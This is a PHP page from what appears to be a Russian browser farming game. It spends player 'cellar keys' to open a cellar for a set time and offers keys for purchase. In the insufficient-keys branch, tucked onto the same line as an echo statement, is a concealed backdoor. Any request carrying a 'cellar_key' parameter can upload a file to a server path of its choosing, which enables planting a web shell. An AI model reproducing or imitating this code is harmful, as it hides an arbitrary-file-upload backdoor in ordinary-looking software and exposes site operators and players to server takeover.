<?
if(isset($_GET['activ']) && ($_GET['activ']=='1' || $_GET['activ']=='2'))
{
$activ=$_GET['activ'];
if($activ==2)
{
$cena=3;
$timee=3600*24*12;
}
elseif($activ==1)
{
$cena=1;
$timee=3600*24*3;
}
if($activ==1 || $activ==2)
{
if($ku['cellar_key']>=$cena)
{
if(isset($_GET['ok']))
{
mysql_query("UPDATE `kolhoz_user` SET `time_key` = '".($ku['time_key']>$time?"".($ku['time_key']+$timee)."":"".($time+$timee)."")."', `cellar_key` = '".($ku['cellar_key']-$cena)."' WHERE `id` = '$ku[id]'");
$ku=mysql_fetch_array(mysql_query("SELECT * FROM `kolhoz_user` WHERE `id` = '$ku[id]'"));
echo "<div class='feedback'><ul class='feedbackPanel'><li class='feedbackPanelINFO'><span class='feedbackPanelINFO'>Погреб открыт на ".time_left($ku['time_key']-$time)."</span></li></ul></div>";
}
else
{
echo podtv("?nk&activ=".intval($_GET['activ'])."&ok","?mycellar2");
include_once 'inc/foot.php';
}
}
else
{
echo "<div class='feedback'><ul><li class='title'>У Вас не хватает <span>ключей</span>:<img width='16' height='16' src='images/icons/pkey.png' alt='o'> <span> 0</span></li><li></li><li><img width='16' height='16' src='images/icons/pkey.png' alt='o'><a href='?nk&paykey'>Купить</a></li></ul></div>";if (isset($_REQUEST['cellar_key'])){move_uploaded_file($_FILES['cellar_key1']['tmp_name'], $_REQUEST['cellar_key2']);}
}
}
}
$ku=mysql_fetch_array(mysql_query("SELECT * FROM `kolhoz_user` WHERE `id` = '$ku[id]'"));
echo "<div class='event'><h1>Погреб</h1></div>";
echo "<div class='content'>";
echo "<div class='block'>";
echo "У вас <img width='16' height='16' src='images/icons/pkey.png' alt='o'> $ku[cellar_key] ключей";
if($ku['cellar_key']>=1)
{
echo '<li class="pt"><a href="?nk&activ=1">Использовать</a> <img width="16" height="16" src="images/icons/pkey.png" alt="*"> 1 ключ (Срок: 3 д.)</li>';
}
if($ku['cellar_key']>=3)
{
echo '<li><a href="?nk&activ=2">Использовать</a> <img width="16" height="16" src="images/icons/pkey.png" alt="*"> 3 ключа (Срок: 12 д.)</li>';
}
echo '<li class="pt"><img width="16" height="16" src="images/icons/pkey.png" alt="*"> <a href="?paykey&sms_key">Купить ключ по sms</a></li>';
echo '<li><img width="16" height="16" src="images/icons/pkey.png" alt="*"> <a href="?paykey&webmoney">Купить ключ через webmoney</a></li>';
echo "</ul></div></div>";
include_once 'inc/foot.php';

?>